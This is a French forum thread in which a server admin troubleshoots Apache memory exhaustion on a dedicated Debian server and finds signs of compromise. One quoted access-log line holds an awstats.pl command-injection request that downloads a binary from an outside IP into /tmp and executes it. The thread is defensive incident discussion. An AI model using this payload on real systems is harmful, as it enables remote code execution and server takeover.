Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1467 connectés 

  FORUM HardWare.fr
  Linux et OS Alternatifs
  réseaux et sécurité

  Serveur dédié qui crash

 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Serveur dédié qui crash

n°769553
lalex
Posté le 09-01-2006 à 22:58:40  profilanswer
 

Bonjour,
 
Ma boite possède un serveur dédié chez Sivit pour rien vous cacher et depuis qu'on a "ouvert" un nouveau site dessus assez conséquent mais pas trop (1000 visites par jour env), j'ai de gros ennuis.
Apache grossit et fini par planter la machine entière (elle n'est pas plantée mais ne répond plus à rien sauf au ping) en saturant les 512 Mo de RAM. Ce qui est curieux, c'est que ça peut aller très très vite à raison de 30 Mo/s environ et j'ai intérêt à stopper Apache avant de saturer les 512 Mo sinon c'est dead. Et du coup, une fois Apache down, je récupère 350 Mo de RAM...
Après avoir matté le log d'accès d'Apache qui fait rien que pour aujourd'hui 8 Mo (!), je me demande si je ne suis pas la cible de flood ou bot ou que sais-je... Des IP zarbs de sites anglais, russes... qui scan toutes les secondes ou presque quelques fichiers et images du site.
Bref, il faut que je trouve très rapidement une solution sachant que ce site était auparavant sur un serv mutualité chez Amen (de l'ultra classique donc) et marchait très bien. Donc le serveur dédié est largement capable de le faire tourner. Il y juste eu redirection de DNS.
 
J'ai essayé quelques filtres IPTables sans succès, et je ne sais plus trop quoi faire...
Toute suggestion est la bienvenue, c'est assez urgent, merci.

mood
Publicité
Posté le 09-01-2006 à 22:58:40  profilanswer
 

n°769554
freds45
Posté le 09-01-2006 à 23:03:58  profilanswer
 

Je passe plutôt dans la cat linux :jap: !


---------------
Filmstory : gardez trace des films que vous avez vu ! :D
n°769583
Sebou77
French Tech powaa :-)
Posté le 10-01-2006 à 08:10:11  profilanswer
 

C'est la dernière version de Apache ?

n°769640
lalex
Posté le 10-01-2006 à 10:46:36  profilanswer
 

Apache/2.0.54 (Debian GNU/Linux) PHP/5.0.5-Debian-0.8~sarge1

n°769649
jlighty
Posté le 10-01-2006 à 11:02:31  profilanswer
 

Peut être que le problème de fuite de mémoire provient du PHP5. Chez ton ancien hébergeur, c'était la version 5 de PHP d'utilisée ?
Si tu n'as pas besoin de PHP5, remet la version 4.

n°769663
lalex
Posté le 10-01-2006 à 11:28:46  profilanswer
 

J'ai besoin de PHP5, et effectivement c'était surement du PHP4 sur Amen.
C'est un site SPIP (www.spip.net), c'est donc pas du code développé par nos soins, il y aurait une fuite de mémoire en PHP5 sur SPIP, ya longtemps qu'on en aurait entendu parler je pense !
Le plus "drôle", c'est que là j'ai le monitor sous les yeux : Je passe sans crier garre de 250 Mo used / 250 Mo free à 480/20 ! En 10 secondes grand max ! Je viens de le laisser comme ça près à killer Apache avant que plus rien ne répondre, et je viens de repasser à 280/211.
 
C'est mystique ou quoi ? :o

n°769673
cvb
Posté le 10-01-2006 à 11:42:15  profilanswer
 

lalex a écrit :

Bonjour,
 
Ma boite possède un serveur dédié chez Sivit pour rien vous cacher et depuis qu'on a "ouvert" un nouveau site dessus assez conséquent mais pas trop (1000 visites par jour env), j'ai de gros ennuis.
Apache grossit et fini par planter la machine entière (elle n'est pas plantée mais ne répond plus à rien sauf au ping) en saturant les 512 Mo de RAM. Ce qui est curieux, c'est que ça peut aller très très vite à raison de 30 Mo/s environ et j'ai intérêt à stopper Apache avant de saturer les 512 Mo sinon c'est dead. Et du coup, une fois Apache down, je récupère 350 Mo de RAM...
Après avoir matté le log d'accès d'Apache qui fait rien que pour aujourd'hui 8 Mo (!), je me demande si je ne suis pas la cible de flood ou bot ou que sais-je... Des IP zarbs de sites anglais, russes... qui scan toutes les secondes ou presque quelques fichiers et images du site.
Bref, il faut que je trouve très rapidement une solution sachant que ce site était auparavant sur un serv mutualité chez Amen (de l'ultra classique donc) et marchait très bien. Donc le serveur dédié est largement capable de le faire tourner. Il y juste eu redirection de DNS.
 
J'ai essayé quelques filtres IPTables sans succès, et je ne sais plus trop quoi faire...
Toute suggestion est la bienvenue, c'est assez urgent, merci.


 
Je ne sais pas si ca vaut quelques chose et si t'as un droit de regard las-dessus. Est-ce que ton serveur, tu peux le pinger ? si oui, il est trés facile pour un marmoulin d'envoyer des quantités de données par le ping et pour peut qu'il mette une boucle infini, ca te "détruit" le serveur et accessoirement la machine ! Donc si tu peux renvoyer des time Out au ping extérieur, fais le, tu éviteras ce genre de déboire à mon sens....  
 
 
@+

n°769678
freds45
Posté le 10-01-2006 à 11:44:59  profilanswer
 

Ya rien de spécial dans les logs d'Apache à ce moment là ?


---------------
Filmstory : gardez trace des films que vous avez vu ! :D
n°769698
lalex
Posté le 10-01-2006 à 12:18:21  profilanswer
 

si :o
 
Ca sent le bon hack avec awstats :
 


211.50.11.4 - - [09/Jan/2006:10:35:25 +0100] "GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20
YYY;echo|  HTTP/1.1" 404 216


n°769699
black_lord
Modérateur
Truth speaks from peacefulness
Posté le 10-01-2006 à 12:22:45  profilanswer
 

vérifie qu'il ne soit pas rooté :o


---------------
uptime is for lousy system administrators what Viagra is for impotent people - mes unixeries - github me
mood
Publicité
Posté le 10-01-2006 à 12:22:45  profilanswer
 

n°769701
lalex
Posté le 10-01-2006 à 12:26:22  profilanswer
 

Cad ?
 
Ya un truk qui m'échappe aussi : D'après le log, il exploite awstats.pl mais tout accès à awstats.pl est protégé par .htaccess + .htpasswd. Donc à moins que le pirate ait réussit à obtenir le log / pass (me demande bien comment), je vois pas trop comment il peut utiliser awstats.pl pour générer du traffic...


Message édité par lalex le 10-01-2006 à 12:26:54
n°769705
jlighty
Posté le 10-01-2006 à 12:48:40  profilanswer
 

Citation :

Cad ?


fait une recherche de rootkit sur ton serveur
http://www.chkrootkit.org/
 
ton hack (awstats.pl) tu l'as retrouvé dans quel log ? access.log ou error.log ?


Message édité par jlighty le 10-01-2006 à 14:23:40
n°769762
lalex
Posté le 10-01-2006 à 14:08:18  profilanswer
 

C'est le technicien Sivit qui m'a balancé la ligne du log... et j'ai beau chercher dans le access et error log du 9/1, je ne trouve pas la ligne en question :o
 
Bref, je suppose qu'il l'a bel et bien trouvé... Je suis en train de checker la maj de awstats en 6.5 (j'ai la 6.4).


Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Linux et OS Alternatifs
  réseaux et sécurité

  Serveur dédié qui crash

 

Sujets relatifs
pb virtualhost [serveur dédié]Serveur de fichier partition ?
Distrib serveur genre SME mais plus souple ???Choix distrib° linux orienté serveur.
Serveur de mail et mots de passeRedémarrer Serveur X sous Debian
Rendre un serveur web visble par touspb configuration serveur x
[Sécurité] Le B.A.-ba pour proteger un serveur de prod ? 
Plus de sujets relatifs à : Serveur dédié qui crash


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR